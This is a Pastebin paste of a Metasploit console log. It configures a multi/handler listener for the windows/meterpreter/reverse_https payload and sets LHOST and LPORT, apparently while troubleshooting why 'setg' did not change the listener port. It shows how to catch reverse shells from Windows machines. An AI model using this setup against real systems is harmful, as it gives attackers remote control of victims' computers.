Guest User

Untitled

a guest
Jul 31st, 2012
378
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.20 KB | None | 0 0
  1. msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
  2. PAYLOAD => windows/meterpreter/reverse_https
  3. msf exploit(handler) > show options
  4.  
  5. Module options (exploit/multi/handler):
  6.  
  7. Name Current Setting Required Description
  8. ---- --------------- -------- -----------
  9.  
  10.  
  11. Payload options (windows/meterpreter/reverse_https):
  12.  
  13. Name Current Setting Required Description
  14. ---- --------------- -------- -----------
  15. EXITFUNC process yes Exit technique: seh, thread, process, none
  16. LHOST yes The local listener hostname
  17. LPORT 8443 yes The local listener port
  18.  
  19.  
  20. Exploit target:
  21.  
  22. Id Name
  23. -- ----
  24. 0 Wildcard Target
  25.  
  26. msf exploit(handler) > setg LHOST 172.10.0.35
  27. LHOST => 172.10.0.35
  28. msf exploit(handler) > setg LPORT 8080
  29. LPORT => 8080
  30. msf exploit(handler) > show options
  31.  
  32. Module options (exploit/multi/handler):
  33.  
  34. Name Current Setting Required Description
  35. ---- --------------- -------- -----------
  36.  
  37.  
  38. Payload options (windows/meterpreter/reverse_https):
  39.  
  40. Name Current Setting Required Description
  41. ---- --------------- -------- -----------
  42. EXITFUNC process yes Exit technique: seh, thread, process, none
  43. LHOST 172.10.0.35 yes The local listener hostname
  44. LPORT 8443 yes The local listener port
  45.  
  46.  
  47. Exploit target:
  48.  
  49. Id Name
  50. -- ----
  51. 0 Wildcard Target
  52.  
  53.  
  54. msf exploit(handler) > set LPORT 8080
  55. LPORT => 8080
  56. msf exploit(handler) > show options
  57.  
  58. Module options (exploit/multi/handler):
  59.  
  60. Name Current Setting Required Description
  61. ---- --------------- -------- -----------
  62.  
  63.  
  64. Payload options (windows/meterpreter/reverse_https):
  65.  
  66. Name Current Setting Required Description
  67. ---- --------------- -------- -----------
  68. EXITFUNC process yes Exit technique: seh, thread, process, none
  69. LHOST 172.10.0.35 yes The local listener hostname
  70. LPORT 8080 yes The local listener port
  71.  
  72.  
  73. Exploit target:
  74.  
  75. Id Name
  76. -- ----
  77. 0 Wildcard Target
  78.  
  79.  
  80. msf exploit(handler) >
Advertisement
Add Comment
Please, Sign In to add comment